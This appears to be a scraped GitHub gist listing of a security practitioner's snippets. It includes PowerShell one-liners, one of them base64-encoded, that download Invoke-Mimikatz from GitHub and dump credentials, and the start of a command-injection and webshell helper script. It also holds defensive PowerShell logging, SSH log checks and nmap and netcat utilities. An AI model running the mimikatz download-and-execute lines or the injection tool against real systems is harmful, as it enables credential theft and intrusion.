Greg Foss gfoss
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function say { | |
| param( [string]$comment = $_ ) | |
| [Reflection.Assembly]::LoadWithPartialName('System.Speech') | Out-Null | |
| $object = New-Object System.Speech.Synthesis.SpeechSynthesizer | |
| $object.SelectVoiceByHints('Female') | |
| $object.Speak("$comment") | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz [local] | |
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
| #encoded-mimikatz [local] | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl |
gfoss
/ PowerShell Command Line Logging
Last active
August 4, 2023 18:02
Detect and alert on nefarious PowerShell command line activity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
| # For detecting dangerous PowerShell Commands/Functions | |
| Log Source Type: | |
| MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
| Add this file to your PowerShell directory to enable verbose command line audit logging | |
| profile.ps1 | |
| $LogCommandHealthEvent = $true | |
| $LogCommandLifeCycleEvent = $true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am gfoss on github. | |
| * I am heinzarelli (https://keybase.io/heinzarelli) on keybase. | |
| * I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E | |
| To claim this, I am signing this object: |
gfoss
/ command injector
Created
September 10, 2014 07:01
script to assist in exploiting command injection vulns / interacting with simple webshells
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Command Injector v0.1 | |
| # greg.foss[at]owasp.org | |
| # modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli | |
| # dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html | |
| function usage { | |
| echo "usage: -u URL" | |
| echo "eg : -u \"http://site.com/index.php?cmd=\"" |
gfoss
/ autopeep.sh
Last active
July 20, 2016 05:41
Simple script used to set peepingtom.py to run automatically via bash script + cronjob, serve up the content and send out e-mail notifications.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications. | |
| # Optimized for Kali Linux | |
| # greg.foss[at]owasp.org | |
| # | |
| # cronjob to run this script once a week every Sunday at Midnight | |
| # 0 0 * * 0 /usr/share/peepingtom/autopeep.sh | |
| # prepare storage location, remove old data, and migrate existing folders |
gfoss
/ nmap-os-detection
Created
August 28, 2013 19:52
OS-detection. Run this nmap command to count OS's and view the os.txt output file to see the results per-system.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices" |
gfoss
/ ssh-attempts.txt
Last active
December 30, 2018 11:02
grep IP addresses from auth logs to see attempted ssh attempts into your box w/ invalid creds {ubuntu}
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #search for invalid logon attempts, pull out IP, remove dupes, sort... | |
| $ grep -rhi 'invalid' /var/log/auth.log* | awk '{print $10}' | uniq | sort > ~/ips.txt | |
| #look em up | |
| $ for i in `cat ~/ips.txt`; do @nslookup $i 2>/dev/null | grep Name | tail -n 1 | cut -d " " -f 3; done > ~/who.txt | |
| # :-) # | |
| $ do moar things... |
gfoss
/ ssh-alert-cronjob
Last active
December 12, 2015 02:38
simple cronjob to alert on 'unknown/unexpected' access to a system.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 */1 * * * last -5 | grep -v '[user]\|wtmp\|reboot\|shutdown' && last -10 | grep -v '[user]\|wtmp\|reboot\|shutdown' >> ~/Desktop/ALERT && wall -g [group] ~/Desktop/ALERT |
gfoss
/ netcat heartbeat
Last active
May 30, 2016 06:27
NetCat based heartbeat one-liner, great for pentesting to let you know if the service you are testing has crashed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ while `nc -nn -vv -z -w3 [ip-address] [port] > /dev/null`; do echo "OK"; sleep 1; done; echo "DOWN"; while (true); do echo "***DOWN***"; sleep 5; done |